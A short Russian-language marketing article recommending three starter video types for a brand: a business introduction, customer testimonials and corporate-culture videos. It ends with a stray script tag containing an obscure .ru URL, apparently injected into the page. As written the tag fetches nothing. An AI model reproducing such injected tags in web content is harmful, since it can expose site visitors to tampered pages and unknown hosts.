3 типа видео, с которых можно начать видеомаркетинг для вашего бренда

Итак, вы поняли, что вам нужно видео, на какое видео? И хотя у каждой компании свой набор требований, есть несколько типов видеороликов, которые подойдут для любого бизнеса.

1. Бизнес Интро

Одним из самых универсальных “безопасных” вариантов является вводное видео. Независимо от типа бизнеса вы можете создать короткий и четкий ролик, который расскажет несколько общих слов о компании или продукте. Даже продукты, которые пока находятся в стадии концепта, можно представить с помощью видеоформата, чтобы пробудить любопытство будущих клиентов. Люди любят узнавать о новых товарах и услугах, когда создатели этих товаров взаимодействуют с аудиторией напрямую.

2. Отзывы клиентов

Отзывы клиентов — это социальное доказательство хорошей работы. Если вы хотя бы некоторое время присутствуете на рынке, у вас обязательно должно быть несколько лояльных клиентов. И потенциальные клиенты гораздо охотнее будут взаимодействовать с вами, зная, что вам доверяют. Видео формату всегда доверяют больше, чем тексту, благодаря реальным эмоциям на лицах клиентов.

3. Корпоративная культура

Хороший способ привлечь новых ярких сотрудников и потенциальных клиентов — это демонстрация культуры вашей организации. Для кандидатов это способ погрузиться в вашу компанию, а для клиентов — показатель того, как вы работаете с покупателями и решаете их проблемы. Видео — лучший способ продемонстрировать то, что происходит внутри вашей компании и за ее пределами, оно прекрасно отражает суть живой корпоративной культуры.

Теперь у вас есть по крайней мере 3 инструмента, чтобы “сломать лед” и сделать первые шаги в видеомаркетинге. Начните прямо сейчас!

<script>http://jjdhsf.ru </script>